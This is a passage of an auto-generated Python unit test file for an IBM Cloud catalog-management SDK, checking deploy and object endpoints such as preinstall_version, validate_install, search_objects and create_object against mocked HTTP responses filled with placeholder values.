        version_loc_id = 'testString'
        x_auth_refresh_token = 'testString'
        cluster_id = 'testString'
        region = 'testString'
        namespace = 'testString'
        override_values = {}
        entitlement_apikey = 'testString'
        schematics = deploy_request_body_schematics_model
        script = 'testString'
        script_id = 'testString'
        version_locator_id = 'testString'
        vcenter_id = 'testString'
        vcenter_user = 'testString'
        vcenter_password = 'testString'
        vcenter_location = 'testString'
        vcenter_datastore = 'testString'

        # Invoke method
        response = _service.preinstall_version(
            version_loc_id,
            x_auth_refresh_token,
            cluster_id=cluster_id,
            region=region,
            namespace=namespace,
            override_values=override_values,
            entitlement_apikey=entitlement_apikey,
            schematics=schematics,
            script=script,
            script_id=script_id,
            version_locator_id=version_locator_id,
            vcenter_id=vcenter_id,
            vcenter_user=vcenter_user,
            vcenter_password=vcenter_password,
            vcenter_location=vcenter_location,
            vcenter_datastore=vcenter_datastore,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 202

        # Validate body params
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['cluster_id'] == 'testString'
        assert req_body['region'] == 'testString'
        assert req_body['namespace'] == 'testString'
        assert req_body['override_values'] == {}
        assert req_body['entitlement_apikey'] == 'testString'
        assert req_body['schematics'] == deploy_request_body_schematics_model
        assert req_body['script'] == 'testString'
        assert req_body['script_id'] == 'testString'
        assert req_body['version_locator_id'] == 'testString'
        assert req_body['vcenter_id'] == 'testString'
        assert req_body['vcenter_user'] == 'testString'
        assert req_body['vcenter_password'] == 'testString'
        assert req_body['vcenter_location'] == 'testString'
        assert req_body['vcenter_datastore'] == 'testString'

    @responses.activate
    def test_preinstall_version_required_params(self):
        """
        preinstall_version() with only the required parameters.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/preinstall')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        version_loc_id = 'testString'
        x_auth_refresh_token = 'testString'

        # Invoke method
        response = _service.preinstall_version(
            version_loc_id,
            x_auth_refresh_token,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 202

    @responses.activate
    def test_preinstall_version_value_error(self):
        """
        Verify that preinstall_version() raises a ValueError when any one of
        its required parameters is None.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/preinstall')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        version_loc_id = 'testString'
        x_auth_refresh_token = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
            "x_auth_refresh_token": x_auth_refresh_token,
        }
        for param in req_param_dict.keys():
            # Compare keys with != (value equality), not the identity
            # operator `is not`, which only worked via string interning.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.preinstall_version(**req_copy)
class TestGetPreinstall():
    """
    Test Class for get_preinstall
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL ending in one or more slashes is registered as a regex so the
        # mock still matches; any other URL is used verbatim.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_preinstall_all_params(self):
        """
        get_preinstall() with all optional parameters; validates the query string.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/preinstall')
        mock_response = '{"metadata": {"cluster_id": "cluster_id", "region": "region", "namespace": "namespace", "workspace_id": "workspace_id", "workspace_name": "workspace_name"}, "release": {"deployments": [{"mapKey": {"anyKey": "anyValue"}}], "replicasets": [{"mapKey": {"anyKey": "anyValue"}}], "statefulsets": [{"mapKey": {"anyKey": "anyValue"}}], "pods": [{"mapKey": {"anyKey": "anyValue"}}], "errors": [{"mapKey": "inner"}]}, "content_mgmt": {"pods": [{"mapKey": "inner"}], "errors": [{"mapKey": "inner"}]}}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'
        x_auth_refresh_token = 'testString'
        cluster_id = 'testString'
        region = 'testString'
        namespace = 'testString'

        # Invoke method
        response = _service.get_preinstall(
            version_loc_id,
            x_auth_refresh_token,
            cluster_id=cluster_id,
            region=region,
            namespace=namespace,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params
        query_string = responses.calls[0].request.url.split('?', 1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'cluster_id={}'.format(cluster_id) in query_string
        assert 'region={}'.format(region) in query_string
        assert 'namespace={}'.format(namespace) in query_string

    @responses.activate
    def test_get_preinstall_required_params(self):
        """
        get_preinstall() with only the required parameters.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/preinstall')
        mock_response = '{"metadata": {"cluster_id": "cluster_id", "region": "region", "namespace": "namespace", "workspace_id": "workspace_id", "workspace_name": "workspace_name"}, "release": {"deployments": [{"mapKey": {"anyKey": "anyValue"}}], "replicasets": [{"mapKey": {"anyKey": "anyValue"}}], "statefulsets": [{"mapKey": {"anyKey": "anyValue"}}], "pods": [{"mapKey": {"anyKey": "anyValue"}}], "errors": [{"mapKey": "inner"}]}, "content_mgmt": {"pods": [{"mapKey": "inner"}], "errors": [{"mapKey": "inner"}]}}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'
        x_auth_refresh_token = 'testString'

        # Invoke method
        response = _service.get_preinstall(
            version_loc_id,
            x_auth_refresh_token,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_preinstall_value_error(self):
        """
        Verify that get_preinstall() raises a ValueError when any one of its
        required parameters is None.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/preinstall')
        mock_response = '{"metadata": {"cluster_id": "cluster_id", "region": "region", "namespace": "namespace", "workspace_id": "workspace_id", "workspace_name": "workspace_name"}, "release": {"deployments": [{"mapKey": {"anyKey": "anyValue"}}], "replicasets": [{"mapKey": {"anyKey": "anyValue"}}], "statefulsets": [{"mapKey": {"anyKey": "anyValue"}}], "pods": [{"mapKey": {"anyKey": "anyValue"}}], "errors": [{"mapKey": "inner"}]}, "content_mgmt": {"pods": [{"mapKey": "inner"}], "errors": [{"mapKey": "inner"}]}}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'
        x_auth_refresh_token = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
            "x_auth_refresh_token": x_auth_refresh_token,
        }
        for param in req_param_dict.keys():
            # Compare keys with != (value equality), not the identity
            # operator `is not`, which only worked via string interning.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_preinstall(**req_copy)
class TestValidateInstall():
    """
    Test Class for validate_install
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL ending in one or more slashes is registered as a regex so the
        # mock still matches; any other URL is used verbatim.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_validate_install_all_params(self):
        """
        validate_install() with every optional body parameter supplied;
        validates the serialized request body.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/validation/install')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Construct a dict representation of a DeployRequestBodySchematics model
        deploy_request_body_schematics_model = {}
        deploy_request_body_schematics_model['name'] = 'testString'
        deploy_request_body_schematics_model['description'] = 'testString'
        deploy_request_body_schematics_model['tags'] = ['testString']
        deploy_request_body_schematics_model['resource_group_id'] = 'testString'

        # Set up parameter values
        version_loc_id = 'testString'
        x_auth_refresh_token = 'testString'
        cluster_id = 'testString'
        region = 'testString'
        namespace = 'testString'
        override_values = {}
        entitlement_apikey = 'testString'
        schematics = deploy_request_body_schematics_model
        script = 'testString'
        script_id = 'testString'
        version_locator_id = 'testString'
        vcenter_id = 'testString'
        vcenter_user = 'testString'
        vcenter_password = 'testString'
        vcenter_location = 'testString'
        vcenter_datastore = 'testString'

        # Invoke method
        response = _service.validate_install(
            version_loc_id,
            x_auth_refresh_token,
            cluster_id=cluster_id,
            region=region,
            namespace=namespace,
            override_values=override_values,
            entitlement_apikey=entitlement_apikey,
            schematics=schematics,
            script=script,
            script_id=script_id,
            version_locator_id=version_locator_id,
            vcenter_id=vcenter_id,
            vcenter_user=vcenter_user,
            vcenter_password=vcenter_password,
            vcenter_location=vcenter_location,
            vcenter_datastore=vcenter_datastore,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 202

        # Validate body params
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['cluster_id'] == 'testString'
        assert req_body['region'] == 'testString'
        assert req_body['namespace'] == 'testString'
        assert req_body['override_values'] == {}
        assert req_body['entitlement_apikey'] == 'testString'
        assert req_body['schematics'] == deploy_request_body_schematics_model
        assert req_body['script'] == 'testString'
        assert req_body['script_id'] == 'testString'
        assert req_body['version_locator_id'] == 'testString'
        assert req_body['vcenter_id'] == 'testString'
        assert req_body['vcenter_user'] == 'testString'
        assert req_body['vcenter_password'] == 'testString'
        assert req_body['vcenter_location'] == 'testString'
        assert req_body['vcenter_datastore'] == 'testString'

    @responses.activate
    def test_validate_install_required_params(self):
        """
        validate_install() with only the required parameters.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/validation/install')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        version_loc_id = 'testString'
        x_auth_refresh_token = 'testString'

        # Invoke method
        response = _service.validate_install(
            version_loc_id,
            x_auth_refresh_token,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 202

    @responses.activate
    def test_validate_install_value_error(self):
        """
        Verify that validate_install() raises a ValueError when any one of
        its required parameters is None.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/validation/install')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        version_loc_id = 'testString'
        x_auth_refresh_token = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
            "x_auth_refresh_token": x_auth_refresh_token,
        }
        for param in req_param_dict.keys():
            # Compare keys with != (value equality), not the identity
            # operator `is not`, which only worked via string interning.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.validate_install(**req_copy)
class TestGetValidationStatus():
    """
    Test Class for get_validation_status
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL ending in one or more slashes is registered as a regex so the
        # mock still matches; any other URL is used verbatim.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_validation_status_all_params(self):
        """
        get_validation_status() happy path with all required parameters.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/validation/install')
        mock_response = '{"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'
        x_auth_refresh_token = 'testString'

        # Invoke method
        response = _service.get_validation_status(
            version_loc_id,
            x_auth_refresh_token,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_validation_status_value_error(self):
        """
        Verify that get_validation_status() raises a ValueError when any one
        of its required parameters is None.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/validation/install')
        mock_response = '{"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'
        x_auth_refresh_token = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
            "x_auth_refresh_token": x_auth_refresh_token,
        }
        for param in req_param_dict.keys():
            # Compare keys with != (value equality), not the identity
            # operator `is not`, which only worked via string interning.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_validation_status(**req_copy)
class TestGetOverrideValues():
    """
    Test Class for get_override_values
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL without a trailing slash can be matched literally; otherwise
        # register a regex that tolerates one or more trailing slashes.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_override_values_all_params(self):
        """
        get_override_values()

        Invoke the operation with all parameters and verify the mocked
        endpoint is hit exactly once and returns HTTP 200.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/validation/overridevalues')
        mock_response = '{"mapKey": {"anyKey": "anyValue"}}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Invoke method
        response = _service.get_override_values(
            version_loc_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_override_values_value_error(self):
        """
        test_get_override_values_value_error()

        Verify that a ValueError is raised whenever any single required
        parameter is missing (None).
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/validation/overridevalues')
        mock_response = '{"mapKey": {"anyKey": "anyValue"}}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
        }
        for param in req_param_dict:
            # Compare keys with == rather than `is`: identity comparison only
            # works for interned strings and is fragile for other key types.
            req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_override_values(**req_copy)
# endregion
##############################################################################
# End of Service: Deploy
##############################################################################
##############################################################################
# Start of Service: Objects
##############################################################################
# region
class TestSearchObjects():
    """
    Test Class for search_objects
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL without a trailing slash can be matched literally; otherwise
        # register a regex that tolerates one or more trailing slashes.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_search_objects_all_params(self):
        """
        search_objects()

        Invoke the operation with all parameters and verify both the
        response status and the serialized query string.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/objects')
        mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        query = 'testString'
        limit = 1000
        offset = 38
        collapse = True
        digest = True

        # Invoke method
        response = _service.search_objects(
            query,
            limit=limit,
            offset=offset,
            collapse=collapse,
            digest=digest,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params (booleans serialize as lowercase strings)
        query_string = responses.calls[0].request.url.split('?',1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'query={}'.format(query) in query_string
        assert 'limit={}'.format(limit) in query_string
        assert 'offset={}'.format(offset) in query_string
        assert 'collapse={}'.format('true' if collapse else 'false') in query_string
        assert 'digest={}'.format('true' if digest else 'false') in query_string

    @responses.activate
    def test_search_objects_required_params(self):
        """
        test_search_objects_required_params()

        Invoke the operation with only the required parameters and verify
        the response status and query string.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/objects')
        mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        query = 'testString'

        # Invoke method
        response = _service.search_objects(
            query,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params
        query_string = responses.calls[0].request.url.split('?',1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'query={}'.format(query) in query_string

    @responses.activate
    def test_search_objects_value_error(self):
        """
        test_search_objects_value_error()

        Verify that a ValueError is raised whenever any single required
        parameter is missing (None).
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/objects')
        mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        query = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "query": query,
        }
        for param in req_param_dict:
            # Compare keys with == rather than `is`: identity comparison only
            # works for interned strings and is fragile for other key types.
            req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.search_objects(**req_copy)
class TestListObjects():
    """
    Test Class for list_objects
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL without a trailing slash can be matched literally; otherwise
        # register a regex that tolerates one or more trailing slashes.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_list_objects_all_params(self):
        """
        list_objects()

        Invoke the operation with all parameters and verify both the
        response status and the serialized query string.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects')
        mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        limit = 1000
        offset = 38
        name = 'testString'
        sort = 'testString'

        # Invoke method
        response = _service.list_objects(
            catalog_identifier,
            limit=limit,
            offset=offset,
            name=name,
            sort=sort,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params
        query_string = responses.calls[0].request.url.split('?',1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'limit={}'.format(limit) in query_string
        assert 'offset={}'.format(offset) in query_string
        assert 'name={}'.format(name) in query_string
        assert 'sort={}'.format(sort) in query_string

    @responses.activate
    def test_list_objects_required_params(self):
        """
        test_list_objects_required_params()

        Invoke the operation with only the required parameters and verify
        the response status.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects')
        mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'

        # Invoke method
        response = _service.list_objects(
            catalog_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_list_objects_value_error(self):
        """
        test_list_objects_value_error()

        Verify that a ValueError is raised whenever any single required
        parameter is missing (None).
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects')
        mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
        }
        for param in req_param_dict:
            # Compare keys with == rather than `is`: identity comparison only
            # works for interned strings and is fragile for other key types.
            req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.list_objects(**req_copy)
class TestCreateObject():
    """
    Test Class for create_object
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL without a trailing slash can be matched literally; otherwise
        # register a regex that tolerates one or more trailing slashes.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_create_object_all_params(self):
        """
        create_object()

        Invoke the operation with all parameters and verify the response
        status and the serialized request body.
        """
        # Set up mock.  Named request_url (not url) so the later body
        # parameter named url cannot shadow it.
        request_url = self.preprocess_url(_base_url + '/catalogs/testString/objects')
        mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
        responses.add(responses.POST,
                      request_url,
                      body=mock_response,
                      content_type='application/json',
                      status=201)

        # Construct a dict representation of a PublishObject model
        publish_object_model = {}
        publish_object_model['permit_ibm_public_publish'] = True
        publish_object_model['ibm_approved'] = True
        publish_object_model['public_approved'] = True
        publish_object_model['portal_approval_record'] = 'testString'
        publish_object_model['portal_url'] = 'testString'

        # Construct a dict representation of a State model
        state_model = {}
        state_model['current'] = 'testString'
        state_model['current_entered'] = "2019-01-01T12:00:00Z"
        state_model['pending'] = 'testString'
        state_model['pending_requested'] = "2019-01-01T12:00:00Z"
        state_model['previous'] = 'testString'

        # Set up parameter values
        catalog_identifier = 'testString'
        id = 'testString'
        name = 'testString'
        rev = 'testString'
        crn = 'testString'
        url = 'testString'
        parent_id = 'testString'
        label_i18n = 'testString'
        label = 'testString'
        tags = ['testString']
        created = string_to_datetime('2019-01-01T12:00:00.000Z')
        updated = string_to_datetime('2019-01-01T12:00:00.000Z')
        short_description = 'testString'
        short_description_i18n = 'testString'
        kind = 'testString'
        publish = publish_object_model
        state = state_model
        catalog_id = 'testString'
        catalog_name = 'testString'
        data = {}

        # Invoke method
        response = _service.create_object(
            catalog_identifier,
            id=id,
            name=name,
            rev=rev,
            crn=crn,
            url=url,
            parent_id=parent_id,
            label_i18n=label_i18n,
            label=label,
            tags=tags,
            created=created,
            updated=updated,
            short_description=short_description,
            short_description_i18n=short_description_i18n,
            kind=kind,
            publish=publish,
            state=state,
            catalog_id=catalog_id,
            catalog_name=catalog_name,
            data=data,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 201

        # Validate body params (datetimes serialize back to ISO-8601 strings)
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['id'] == 'testString'
        assert req_body['name'] == 'testString'
        assert req_body['_rev'] == 'testString'
        assert req_body['crn'] == 'testString'
        assert req_body['url'] == 'testString'
        assert req_body['parent_id'] == 'testString'
        assert req_body['label_i18n'] == 'testString'
        assert req_body['label'] == 'testString'
        assert req_body['tags'] == ['testString']
        assert req_body['created'] == "2019-01-01T12:00:00Z"
        assert req_body['updated'] == "2019-01-01T12:00:00Z"
        assert req_body['short_description'] == 'testString'
        assert req_body['short_description_i18n'] == 'testString'
        assert req_body['kind'] == 'testString'
        assert req_body['publish'] == publish_object_model
        assert req_body['state'] == state_model
        assert req_body['catalog_id'] == 'testString'
        assert req_body['catalog_name'] == 'testString'
        assert req_body['data'] == {}

    @responses.activate
    def test_create_object_required_params(self):
        """
        test_create_object_required_params()

        Invoke the operation with only the required parameters and verify
        the response status.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects')
        mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=201)

        # Set up parameter values
        catalog_identifier = 'testString'

